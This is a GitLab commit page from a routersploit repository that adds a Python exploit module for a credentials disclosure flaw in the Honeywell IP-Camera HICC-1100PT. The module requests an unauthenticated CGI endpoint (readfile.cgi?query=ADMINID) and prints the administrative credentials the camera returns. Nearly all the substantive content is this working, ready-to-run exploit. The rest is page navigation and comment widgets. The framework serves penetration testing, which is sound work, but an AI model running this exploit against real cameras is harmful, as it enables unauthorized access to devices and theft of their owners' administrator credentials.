Skip to content
Projects
Groups
Snippets
Help
This project
Loading...
Sign in / Register
Toggle navigation
R
routersploit
Overview
Overview
Details
Activity
Cycle Analytics
Repository
Repository
Files
Commits
Branches
Tags
Contributors
Graph
Compare
Charts
Issues
0
Issues
0
List
Board
Labels
Milestones
Merge Requests
0
Merge Requests
0
CI / CD
CI / CD
Pipelines
Jobs
Schedules
Charts
Wiki
Wiki
Snippets
Snippets
Members
Members
Collapse sidebar
Close sidebar
Activity
Graph
Charts
Create a new issue
Jobs
Commits
Issue Boards
Open sidebar
czos-dpend
routersploit
Commits
b28220b8
Commit
b28220b8
authored
Apr 25, 2017
by
Marcin Bury
Committed by
Mariusz Kupidura
Apr 25, 2017
Browse files
Options
Browse Files
Download
Email Patches
Plain Diff
Honeywell IP-Camera HICC-1100PT - Credentials Disclosure (#247)
parent
38f0fa23
Hide whitespace changes
Inline
Side-by-side
Showing
2 changed files
with
55 additions
and
0 deletions
+55
-0
__init__.py
routersploit/modules/exploits/cameras/honeywell/__init__.py
+0
-0
hicc_1100pt_password_disclosure.py
...oits/cameras/honeywell/hicc_1100pt_password_disclosure.py
+55
-0
No files found.
routersploit/modules/exploits/cameras/honeywell/__init__.py
0 → 100644
View file @
b28220b8
routersploit/modules/exploits/cameras/honeywell/hicc_1100pt_password_disclosure.py
0 → 100644
View file @
b28220b8
from
routersploit
import
(
exploits
,
print_error
,
print_info
,
print_success
,
http_request
,
mute
,
validators
)
class
Exploit
(
exploits
.
Exploit
):
"""
Exploit implementation for Honeywell IP-Camera HICC-1100PT Password Dislosure vulnerability.
If target is vulnerable it is possible to read administative credentials.
"""
__info__
=
{
'name'
:
'Honeywell IP-Camera HICC-1100PT Password Disclosure'
,
'description'
:
'Module exploits Honeywell IP-Camera HICC-1100PT Password Dislosure vulnerability. If target is vulnerable '
'it is possible to read administrative credentials'
,
'authors'
:
[
'Yakir Wizman'
,
# vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>'
,
# routersploit module
],
'references'
:
[
'https://www.exploit-db.com/exploits/40261/'
,
],
'devices'
:
[
'Honeywell IP-Camera HICC-1100PT'
,
],
}
target
=
exploits
.
Option
(
''
,
'Target address e.g. http://192.168.1.1'
,
validators
=
validators
.
url
)
# target address
port
=
exploits
.
Option
(
80
,
'Target port'
)
# default port
def
__init__
(
self
):
self
.
content
=
None
def
run
(
self
):
if
self
.
check
():
print_success
(
"Target seems to be vulnerable"
)
print_info
(
self
.
content
)
else
:
print_error
(
"Exploit failed - target seems to be not vulnerable"
)
@mute
def
check
(
self
):
url
=
"{}:{}/cgi-bin/readfile.cgi?query=ADMINID"
.
format
(
self
.
target
,
self
.
port
)
response
=
http_request
(
method
=
"GET"
,
url
=
url
)
if
response
is
not
None
and
"Adm_ID"
in
response
.
text
:
self
.
content
=
response
.
text
return
True
# target is vulnerable
return
False
# target is not vulnerable
Write
Preview
Markdown
is supported
0%
Try again
or
attach a new file
Attach a file
Cancel
You are about to add
0
people
to the discussion. Proceed with caution.
Finish editing this message first!
Cancel
Please
register
or
sign in
to comment